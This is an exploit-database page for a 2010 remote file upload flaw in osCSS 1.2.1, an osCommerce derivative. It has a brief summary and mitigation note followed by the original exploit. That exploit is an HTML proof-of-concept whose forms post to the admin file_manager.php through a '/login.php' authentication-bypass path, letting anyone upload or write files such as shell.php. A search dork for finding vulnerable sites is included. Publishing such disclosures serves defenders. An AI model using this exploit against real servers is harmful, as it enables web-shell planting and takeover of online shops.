header-logo
Suggest Exploit
vendor:
osCommerce
by:
indoushka
8,8
CVSS
HIGH
Remote File Upload
434
CWE
Product Name: osCommerce
Affected Version From: 1.2.1
Affected Version To: 1.2.1
Patch Exists: NO
Related CWE: N/A
CPE: oscommerce
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities

A vulnerability exists in osCommerce 1.2.1 which allows an attacker to upload malicious files to the server. The vulnerability is due to insufficient validation of the file being uploaded. An attacker can exploit this vulnerability by uploading a malicious file to the server and then executing it.

Mitigation:

Ensure that all files being uploaded are properly validated and sanitized before being accepted.
Source

Exploit-DB raw data:

======================================================================= 
# osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities 
======================================================================= 

######################################################################## 
# Vendor: http://www.oscommerce.com/ 
# Date: 2010-05-27 
# Author : indoushka 
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 
# Contact : indoushka@hotmail.com 
# Home : www.arab-blackhat.co.cc
# Dork : E-Commerce Engine Copyright © 2005 osCSS 
# Bug  : Remote File Upload 
# Tested on : windows SP2 Français V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 

<html><head><title> osCSS 1.2.1 - Remote File Upload </title></head> 

<br><br><u>UPLOAD FILE:</u><br> 

<form name="file" action="http://<--  CHANGE HERE   -->/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data"> 

<input type="file" name="file_1"><br> 

<input name="submit" type="submit" value="   Upload   " > 

</form> 

<br><u>CREATE FILE:</u><br> 

<form name="new_file" action="http://<--  CHANGE HERE   -->/admin/file_manager.php/login.php?action=save" method="post"> 

FILE NAME:<br> 

<input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br> 

<textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt; 

<input name="submit" type="submit" value="   Save   " > 

</form> 

</html> 

Go to Original path to finde what you upload : http://127.0.0.1/osCSS/ch99.php

Dz-Ghost Team : Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel :
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N